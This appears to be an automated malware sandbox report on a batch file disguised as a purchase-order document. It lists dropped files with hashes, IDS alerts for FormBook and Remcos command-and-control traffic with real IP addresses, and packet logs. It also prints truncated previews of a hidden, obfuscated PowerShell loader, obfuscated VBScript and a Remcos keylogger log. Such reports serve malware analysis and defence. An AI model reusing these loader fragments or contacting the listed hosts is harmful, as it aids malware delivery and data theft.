                                                          SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1412
                                                          Entropy (8bit):5.4341426742178625
                                                          Encrypted:false
                                                          SSDEEP:24:35we1WSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NK3R8CiagUMEOsr:+kWSU4xympjms4RIoU99tK8NWR8CN/OS
                                                          MD5:650442BF25AE2C56DB058CC0066DB72D
                                                          SHA1:17399EA4E4386F13344E6EDE6ED1CD5F54098E16
                                                          SHA-256:85004E8DD992D4E1F4AEC60728DAFF66F39B2AA1AE062D2BEBF21E29DBD9899B
                                                          SHA-512:8D502B37B20456610F509CEC991FB75794E915D8EF5D2691752FDC03B032272178FBD8F3D698940DDC4B70693F3CE809301BA2F1445CB4F9334E11076B321564
                                                          Malicious:false
                                                          Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):27724
                                                          Entropy (8bit):5.249757392580612
                                                          Encrypted:false
                                                          SSDEEP:768:kkLQ0qWMSjljbdC1yyWiTfQvx/nkl4gr/Mg8/:kn0eClUtanYr/z8/
                                                          MD5:BFC67754721884CC0140E7534EAA0F61
                                                          SHA1:2E59368919AFB98121950C73F03429F530F295B3
                                                          SHA-256:388B073997E4C52EC96B4C55EB00667B4C4A4D1A3BEC85431E38C7683D313B45
                                                          SHA-512:290CEA431CF5F8B8BFA4687DE431ACC1B7F3A48124079CE59B1D76D29605A8586C62072CAAA22AF51091B17582F998232CBE19BC33B9DA174F09160F24E8BD87
                                                          Malicious:true
                                                          Preview:..................Tricalcichypotaxic = FormatCurrency(8841128)............Function Rkkende ()....For I = 1566 To 84 step - 1..Chondriosphere = Chondriosphere & "Minatories"..next....blufrdighedens = blufrdighedens & "If (${hoswo"..Const Electrostatics = "Nulleder reenumerate:"..Const Mediterraneous = "Unimpearled: haandbevgelsens"..Const Straffende = "Apoteksassistenten! unrepublican."..Const Politikommissrers = &HB584..Const Hyldetrer = 26206..Const Koreografis = "Garderkasernes: vouching3?"..Const Vitriolling = "Fordelingsposter horisonts?"..Const Halvvaagne = -17648..Const Denver = &HB5ED..Const Thebaic119 = "Tillites13 hydras!"..Const Fllesakten = &HFFFF1BD1..Const blindnesses = "Screwdriver frontend!"..Const Rokningens = &HD0CD..Const Cognizing = -64479..Const Towerier92 = "Bgehj fritillary"..Const unduly = &HD5DB..Const Unrestrainedly = 32887..Const Forgiftningernes159 = &HFFFF0635..Const Smocksyningens135 = "Bruttoregistertonnet. grnsefunktionerne"..Const Absint = 20625..Const S
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 15728640
Entropy (8bit): 0.10805027086476268
Encrypted: false
SSDEEP: 1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
MD5: 9F6FBA8CABF6D4ECDD5B285F375D352B
SHA1: ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
SHA-256: 4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
SHA-512: 75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
Malicious: false

Process: C:\Windows\SysWOW64\relog.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: Unicode text, UTF-16, little-endian text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Preview: ..

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 462320
Entropy (8bit): 5.949052812982134
Encrypted: false
SSDEEP: 12288:HFUxNn2n4uYm3RE73oYc7BKZupikLZ1CmdYFqP37:lEN259E6/t2m1
MD5: 57B90FD435B223BE1197BF2C261BC942
SHA1: D10B30FE2E5A5656DD6E6ED7A3299FFE3CFA4F5C
SHA-256: D798DA8EE8AD968C48094F2C59A3A0F57BE04360D74AD388DFA9E05399E066D9
SHA-512: 897B50909094736E8FD452F7F987454963DBA11225F7E1BD2F09CB7ABDFA7B89865EC73BD9C87FF17FC5FC2CE4270799395E26A4278AA6E16A2B44F43194EEB2
Malicious: false

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6221
Entropy (8bit): 3.7338503071064486
Encrypted: false
SSDEEP: 96:GDUknJe33CxHltGkvhkvCCtN2Re3dHvjRe3eHvq:GDUkJeyFtSN2RIjRBq
MD5: 1D6D532A510B967815CC9A8663CE8EFF
SHA1: 6E0250DE4AEFAD878B0FE36CE36AF5694110C5D5
SHA-256: 80619C905AEB5B94489C9943B346E62899891348AEA70A01AFD0F14609942549
SHA-512: 928F39CFA71B39076C2DEA4DA91AC85D672BB9FA6E22118401D54023A183D36973A5BE09371BB24A6A8BBE4EECA19E86BF058B00E374F78D47FA3B807AF4E1A8
Malicious: false

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6221
Entropy (8bit): 3.7338503071064486
Encrypted: false
SSDEEP: 96:GDUknJe33CxHltGkvhkvCCtN2Re3dHvjRe3eHvq:GDUkJeyFtSN2RIjRBq
MD5: 1D6D532A510B967815CC9A8663CE8EFF
SHA1: 6E0250DE4AEFAD878B0FE36CE36AF5694110C5D5
SHA-256: 80619C905AEB5B94489C9943B346E62899891348AEA70A01AFD0F14609942549
SHA-512: 928F39CFA71B39076C2DEA4DA91AC85D672BB9FA6E22118401D54023A183D36973A5BE09371BB24A6A8BBE4EECA19E86BF058B00E374F78D47FA3B807AF4E1A8
Malicious: false

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 421524
Entropy (8bit): 5.956998934075221
Encrypted: false
SSDEEP: 12288:/skcXpnpPnPp6GCOfM37gGA8zUBSzaX8xfzks:/sk2ptnAOPfa8SBz
MD5: C307CFEB8434B059E8B0FA985D12DAFD
SHA1: 978BC8A0010D25CB355A4C059BF433EFD8613C32
SHA-256: 2C382E87B37C4A9404F3A7B445D2071B9B8EE1CF893998F606188AB3091457D2
SHA-512: D26779CB4CCC561849BC7364097715323F87D1581FA7A1E1A3DE3F4976E2D627480B5BDB1A05E8088DBD8EE4F5E321E8D96397E96F72B77E263B4EC16F48A436
Malicious: false

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: data
Category: dropped
Size (bytes): 558
Entropy (8bit): 3.3147222285753926
Encrypted: false
SSDEEP: 12:6ldecmlfQclabWFe5UlnlvbWFepie5UlruYclrnAbW+:6GcmdQckWqUdJWGUAjaW+
MD5: 412DFDB3346CCA6A5A77EBEA0CB0387E
SHA1: 15C20D1C99D6B57574425EA8229E92679E2F9CC8
SHA-256: 511D2D85A0C20D2DF2DD14CCC7323E6AE99DF63219931A970A527007CDAC2BFB
SHA-512: 56DA958CCDBD1A46DE5FFEFD61014B855058CCF5941350975B26AC66FFEBF5F911B748969E9F4EB52F8CC7AE41B18F40A385D66AFF12CE5F898A4E4CA578A30C
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\sfvnspt.dat, Author: Joe Security
Preview (decoded from UTF-16): [2024/08/28 08:01:52 Offline Keylogger Started] [2024/08/28 08:01:53 Run] [2024/08/28 08:01:53 Program Manager] [Win]r [2024/08/28 08:01:57 Run] [2024/08/28 08:02:00 Program Manager] [Win]r[Win]r [2024/08/28 08:03:01 Run] [2024/08/28 08:03:39 Program Manager]

File type: ASCII text, with very long lines (4349), with no line terminators
Entropy (8bit): 5.411198223907365
TrID:
File name: PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat
File size: 4'349 bytes
MD5: a7cf853aab7a489baa2e3fc8e31ab25f
SHA1: b114e9292f9c733594bc058fbec8f7ed63bfc208
SHA256: 5f6652b2b1984430374890d518550109bcef83b980557b985e502e70e80a7392
SHA512: 462411feea2d8730c528dba83e232d5401efb209b774ee02c5c78811d1ad6546dee6a6c33db83f0b5b8001aa5694c448b6d010b204a246b46f1c43c68301f391
SSDEEP: 96:mMHCq5motGI0XJ+lMd7XaHtAtY/w58ew0LAQaBC:mc5motGI0mMd7YtFwCewpC
TLSH: D391195B1C5E924D85648E144C19D6881AE6C686F10B0F0BE39CD08A0B9DE283F3FDB9
File Content Preview: start /min powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftsko
Icon Hash: 9686878b929a9886

Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-28T14:04:42.147766+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49768 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-28T14:04:15.934465+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49760 | 80 | 192.168.2.4 | 188.114.96.3
2024-08-28T14:03:08.970058+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 49745 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-28T14:04:44.668227+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 49769 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-28T14:02:33.150777+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49744 | 80 | 192.168.2.4 | 193.25.216.165
2024-08-28T14:04:05.109115+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 49757 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-28T14:01:49.458361+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49737 | 443 | 192.168.2.4 | 104.21.62.202
2024-08-28T14:04:10.871771+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49758 | 80 | 192.168.2.4 | 188.114.96.3
2024-08-28T14:03:43.242699+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49750 | 80 | 192.168.2.4 | 5.78.41.174
2024-08-28T14:04:29.050512+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49764 | 80 | 192.168.2.4 | 34.149.87.45
2024-08-28T14:03:59.981894+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49755 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-28T14:01:55.733878+0200 | TCP | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 57484 | 49738 | 172.111.137.132 | 192.168.2.4
2024-08-28T14:03:25.070543+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49746 | 80 | 192.168.2.4 | 162.241.2.92
2024-08-28T14:05:12.409303+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 49777 | 80 | 192.168.2.4 | 203.161.41.205
2024-08-28T14:04:39.621945+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49767 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-28T14:05:09.964722+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49776 | 80 | 192.168.2.4 | 203.161.41.205
2024-08-28T14:05:18.919734+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49778 | 80 | 192.168.2.4 | 64.46.102.70
2024-08-28T14:04:24.326359+0200 | TCP | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 57484 | 49738 | 172.111.137.132 | 192.168.2.4
2024-08-28T14:04:23.975590+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49762 | 80 | 192.168.2.4 | 34.149.87.45
2024-08-28T14:03:27.599191+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49747 | 80 | 192.168.2.4 | 162.241.2.92
2024-08-28T14:01:55.002482+0200 | TCP | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 49738 | 57484 | 192.168.2.4 | 172.111.137.132
2024-08-28T14:03:45.776632+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49751 | 80 | 192.168.2.4 | 5.78.41.174
2024-08-28T14:03:32.741111+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 49749 | 80 | 192.168.2.4 | 162.241.2.92
2024-08-28T14:04:53.283615+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49771 | 80 | 192.168.2.4 | 142.250.186.147
2024-08-28T14:04:51.095333+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49770 | 80 | 192.168.2.4 | 142.250.186.147
2024-08-28T14:04:58.730195+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 49773 | 80 | 192.168.2.4 | 142.250.186.147
2024-08-28T14:04:26.541437+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49763 | 80 | 192.168.2.4 | 34.149.87.45
2024-08-28T14:05:04.819790+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49774 | 80 | 192.168.2.4 | 203.161.41.205
2024-08-28T14:04:55.821968+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49772 | 80 | 192.168.2.4 | 142.250.186.147
2024-08-28T14:05:07.328379+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49775 | 80 | 192.168.2.4 | 203.161.41.205
2024-08-28T14:03:50.835146+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 49753 | 80 | 192.168.2.4 | 5.78.41.174
2024-08-28T14:03:57.553845+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49754 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-28T14:04:13.389766+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49759 | 80 | 192.168.2.4 | 188.114.96.3
2024-08-28T14:04:18.440443+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 49761 | 80 | 192.168.2.4 | 188.114.96.3
2024-08-28T14:04:31.580553+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 49765 | 80 | 192.168.2.4 | 34.149.87.45
2024-08-28T14:04:01.584087+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49756 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-28T14:01:56.654315+0200 | TCP | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 49741 | 80 | 192.168.2.4 | 178.237.33.50
2024-08-28T14:03:30.124862+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49748 | 80 | 192.168.2.4 | 162.241.2.92
2024-08-28T14:04:38.000818+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49766 | 80 | 192.168.2.4 | 3.33.130.190
2024-08-28T14:03:48.309831+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 49752 | 80 | 192.168.2.4 | 5.78.41.174

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Aug 28, 2024 14:01:12.443192959 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.443201065 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.443243027 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.444519997 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.444578886 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.444937944 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.444993973 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.445081949 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.445136070 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.445343018 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.445405006 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.445780993 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.445835114 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.445935011 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.445961952 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.445986986 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.445992947 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.446002960 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.446297884 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.446342945 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.446348906 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.446388006 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.447973967 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.448031902 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.448604107 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.448662043 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531232119 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531281948 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531292915 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531389952 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531435013 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531462908 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531464100 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531507015 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531517029 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531552076 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531662941 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531733036 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531755924 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531781912 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531833887 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.531840086 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.531852007 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532147884 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532175064 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532202959 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532211065 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532233953 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532356024 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532406092 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532413006 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532438040 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532455921 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532460928 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532485962 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532576084 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532602072 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532627106 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532634020 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.532654047 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.532972097 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533047915 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533047915 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533061028 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533101082 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533226013 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533250093 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533277035 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533282995 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533299923 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533320904 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533364058 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533370018 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533416033 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533855915 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533909082 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.533938885 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533971071 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.533996105 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.534001112 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.534012079 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.534099102 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.534117937 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.534146070 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.534152985 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.534182072 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.536062956 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.536120892 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.536128044 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.536173105 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.536350965 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.536401987 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.536412001 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.536468983 CEST49730443192.168.2.4104.21.62.202
                                                            Aug 28, 2024 14:01:12.622292042 CEST44349730104.21.62.202192.168.2.4
                                                            Aug 28, 2024 14:01:12.622332096 CEST44349730104.21.62.202192.168.2.4
